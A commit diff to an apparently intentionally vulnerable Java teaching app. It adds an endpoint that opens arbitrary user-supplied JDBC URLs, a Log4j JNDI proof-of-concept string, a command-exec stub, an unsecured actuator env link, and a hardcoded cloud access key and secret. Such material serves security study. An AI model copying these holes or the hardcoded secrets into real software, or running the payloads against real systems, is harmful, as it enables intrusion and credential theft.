add jdbc & actuator ak_secret

Author: JoyChou93

java-sec-code.iml

@@ -337,6 +337,13 @@
             <version>42.3.1</version>
         </dependency>
 
+        <!-- jdbc db2 rce -->
+        <dependency>
+            <groupId>com.ibm.db2</groupId>
+            <artifactId>jcc</artifactId>
+            <version>11.5.8.0</version>
+        </dependency>
+
     </dependencies>
 
     <dependencyManagement>

pom.xml

@@ -0,0 +1,36 @@
+package org.joychou.controller;
+
+import lombok.extern.slf4j.Slf4j;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+import java.sql.DriverManager;
+
+/**
+ * Jdbc Attack @2023.04
+ */
+@Slf4j
+@RestController
+@RequestMapping("/jdbc")
+public class Jdbc {
+
+    /**
+     * <a href="https://github.com/JoyChou93/java-sec-code/wiki/CVE-2022-21724">CVE-2022-21724</a>
+     */
+    @RequestMapping("/postgresql")
+    public void postgresql(String jdbcUrlBase64) throws Exception{
+        byte[] b = java.util.Base64.getDecoder().decode(jdbcUrlBase64);
+        String jdbcUrl = new String(b);
+        log.info(jdbcUrl);
+        DriverManager.getConnection(jdbcUrl);
+    }
+
+    @RequestMapping("/db2")
+    public void db2(String jdbcUrlBase64) throws Exception{
+        Class.forName("com.ibm.db2.jcc.DB2Driver");
+        byte[] b = java.util.Base64.getDecoder().decode(jdbcUrlBase64);
+        String jdbcUrl = new String(b);
+        log.info(jdbcUrl);
+        DriverManager.getConnection(jdbcUrl);
+    }
+}

src/main/java/org/joychou/controller/Jdbc.java

@@ -26,4 +26,9 @@ public String log4j(String token) {
         }
     }
 
+    public static void main(String[] args) {
+        String poc = "${jndi:ldap://127.0.0.1:1389/f616nl}";
+        logger.error(poc);
+    }
+
 }

src/main/java/org/joychou/controller/Log4j.java

@@ -58,8 +58,7 @@ public String CommandExec(String cmd) {
 
 
     /**
-     * http://localhost:8080/rce/ProcessBuilder?cmd=whoami
-     * @param cmd cmd
+     * <a href="http://localhost:8080/rce/ProcessBuilder?cmd=whoami">POC</a>
      */
     @GetMapping("/ProcessBuilder")
     public String processBuilder(String cmd) {
@@ -131,16 +130,10 @@ public void groovyshell(String content) {
         groovyShell.evaluate(content);
     }
 
-    /**
-     * <a href="https://github.com/JoyChou93/java-sec-code/wiki/CVE-2022-21724">CVE-2022-21724</a>
-     */
-    @RequestMapping("/postgresql")
-    public void postgresql(String jdbcUrlBase64) throws Exception{
-        byte[] b = java.util.Base64.getDecoder().decode(jdbcUrlBase64);
-        String jdbcUrl = new String(b);
-        log.info(jdbcUrl);
-        DriverManager.getConnection(jdbcUrl);
-    }
 
+
+    public static void main(String[] args) throws Exception{
+        Runtime.getRuntime().exec("touch /tmp/x");
+    }
 }
 

src/main/java/org/joychou/controller/Rce.java

@@ -436,8 +436,8 @@ public interface UserPayload {
             String getUserName();
         }
 
+    public static void main(String[] args) {
 
-    public static void main(String[] args)  {
     }
 
 }

src/main/java/org/joychou/controller/XXE.java

@@ -188,6 +188,7 @@ public static String host2ip(String host) {
             InetAddress IpAddress = InetAddress.getByName(host);
             return IpAddress.getHostAddress();
         } catch (Exception e) {
+            logger.error("host2ip exception " + e.getMessage());
             return "";
         }
     }
@@ -198,45 +199,57 @@ public static String host2ip(String host) {
      * @return Octal ip returns true, others return false. 012.23.78.233 return true. 012.0x17.78.233 return false.
      */
     public static boolean isOctalIP(String host) {
-        String[] ipParts = host.split("\\.");
-        StringBuilder newDecimalIP = new StringBuilder();
-        boolean is_octal = false;
-
-        // Octal ip only has number and dot character.
-        if (isNumberOrDot(host)) {
-
-            // not support ipv6
-            if (ipParts.length > 4) {
-                throw new SSRFException("Illegal ipv4: " + host);
-            }
-
-            // 01205647351
-            if( ipParts.length == 1 && host.startsWith("0") ) {
-                decimalIp = Integer.valueOf(host, 8).toString();
-                return true;
-            }
+        try{
+            String[] ipParts = host.split("\\.");
+            StringBuilder newDecimalIP = new StringBuilder();
+            boolean is_octal = false;
+
+            // Octal ip only has number and dot character.
+            if (isNumberOrDot(host)) {
+
+                // not support ipv6
+                if (ipParts.length > 4) {
+                    logger.error("Illegal ipv4: " + host);
+                    return false;
+                }
 
-            // 012.23.78.233
-            for(String ip : ipParts) {
-                if (!isNumber(ip)){
-                    throw new SSRFException("Illegal ipv4: " + host);
+                // 01205647351
+                if( ipParts.length == 1 && host.startsWith("0") ) {
+                    decimalIp = Integer.valueOf(host, 8).toString();
+                    return true;
                 }
-                if (ip.startsWith("0")) {
-                    if (Integer.valueOf(ip, 8) >= 256){
-                        throw new SSRFException("Illegal ipv4: " + host);
+
+                // 012.23.78.233
+                for(String ip : ipParts) {
+                    if (!isNumber(ip)){
+                        logger.error("Illegal ipv4: " + host);
+                        return false;
                     }
-                    newDecimalIP.append(Integer.valueOf(ip, 8)).append(".");
-                    is_octal = true;
-                }else{
-                    if (Integer.valueOf(ip, 10) >= 256) {
-                        throw new SSRFException("Illegal ipv4: " + host);
+                    // start with "0", but not "0"
+                    if (ip.startsWith("0") && !ip.equals("0")) {
+                        if (Integer.valueOf(ip, 8) >= 256){
+                            logger.error("Illegal ipv4: " + host);
+                            return false;
+                        }
+                        newDecimalIP.append(Integer.valueOf(ip, 8)).append(".");
+                        is_octal = true;
+                    }else{
+                        if (Integer.valueOf(ip, 10) >= 256) {
+                            logger.error("Illegal ipv4: " + host);
+                            return false;
+                        }
+                        newDecimalIP.append(ip).append(".");
                     }
-                    newDecimalIP.append(ip).append(".");
                 }
+                // delete last char .
+                decimalIp = newDecimalIP.substring(0, newDecimalIP.lastIndexOf("."));
             }
-            decimalIp = newDecimalIP.substring(0, newDecimalIP.lastIndexOf("."));
+            return is_octal;
+        } catch (Exception e){
+            logger.error("SSRFChecker isOctalIP exception: " + e.getMessage());
+            return false;
         }
-        return is_octal;
+
     }
 
     /**

src/main/java/org/joychou/security/ssrf/SSRFChecker.java

@@ -9,8 +9,6 @@ logging.level.org.joychou.mapper=debug
 
 # Spring Boot Actuator Config
 management.security.enabled=false
-endpoints.enabled=true
-
 
 # logging.config=classpath:logback-online.xml
 
@@ -55,3 +53,6 @@ joychou.no.need.login.url = /css/**, /js/**, /xxe/**, /rce/**, /deserialize/**,
 
 # http header max size
 #server.max-http-header-size=30000
+
+jsc.accessKey.id=LTAI5tSAEPX3Z5N2Yt8ogc2y
+jsc.accessKey.secret=W1Poxj09wN0Zu6dDsS0on3SIUhOhK7

src/main/resources/application.properties

@@ -20,6 +20,7 @@
     <a th:href="@{/rce/exec?cmd=whoami}">RCE</a>&nbsp;&nbsp;
     <a th:href="@{/ooxml/upload}">ooxml XXE</a>&nbsp;&nbsp;
     <a th:href="@{/xlsx-streamer/upload}">xlsx-streamer XXE</a>
+    <a th:href="@{/env}">actuator env</a>
 </p>
 
 <P>